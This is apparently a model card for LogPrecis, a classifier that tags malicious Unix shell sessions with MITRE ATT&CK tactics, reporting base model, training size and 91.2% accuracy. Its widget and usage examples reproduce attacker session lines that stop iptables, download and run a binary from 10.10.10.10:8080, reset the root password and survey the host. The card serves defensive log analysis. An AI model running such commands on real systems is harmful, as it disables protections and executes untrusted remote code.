---
widget:
- text: etc/init.d/iptables stop ; wget –c http://10.10.10.10:8080/exec ; chmod 777 exec ; ./exec ;
- text: cat /proc/cpuinfo | grep name | wc -l ; echo -e pcnv81k7W9cAOnonv81k7W9cAOno | passwd | bash ; echo pcnv81k7W9cAOnonv81k7W9cAOnon | passwd ; echo 321 > /var/tmp/.var03522123 ; rm -rf /var/tmp/.var03522123 ; cat /var/tmp/.var03522123 | head -n 1 ; cat /proc/cpuinfo | grep name | head -n 1 | awk {print $4,$5,$6,$7,$8,$9;} ; free -m | grep Mem | awk {print $2 ,$3, $4, $5, $6, $7} ; ls -lh $which ls ; crontab -l ; w ; uname -m ; cat /proc/cpuinfo | grep model | grep name | wc -l ; top ; uname ; uname -a ; lscpu | grep Model ; echo admin pc > /tmp/up.txt ; rm -rf /var/tmp/dota* ;
- text: which awk ; echo ywp6g8mu8yv2 ; echo nuw38vipcor9 | awk {print toupper$0\"f3\"} | grep -o .....$ ; which awk ; echo wnxsrab3910m ; echo 05wm3lz34a21 | awk {print toupper$0\"fs\"} | grep -o .....$ ;
- text: cat /bin/echo ;
---

[LogPrecis](https://arxiv.org/abs/2307.08309) is a model fine-tuned for **Token Classification**. 

The base model is [SecureShellBert](https://huggingface.co/SmartDataPolito/SecureShellBert), a [Codebert](https://huggingface.co/microsoft/codebert-base) previously domain-adapted using a corpus of **>20k Unix sessions**. Later, it was further finetuned on the task of **Token Classification** with **360 labelled examples**.


Specifically, LogPrecis is designed for the analysis of **malicious Unix logs**. Given as input a Unix session:

```shell
etc/init.d/iptables stop ; wget –c http://10.10.10.10:8080/exec ; chmod 777 exec ; ./exec ;
```

LogPrecis outputs the sequence of [Mitre Tactics](https://attack.mitre.org/tactics/enterprise/):

`Impact x 3 -- Execution x 10`

LogPrecis achieved a **91.2% accuracy** on the test set. Its training code, data and training details are available on SmartData's [GitHub](https://github.com/SmartData-Polito/logprecis). 

---
metrics:
- accuracy
- rouge
  
pipeline_tag: token-classification
---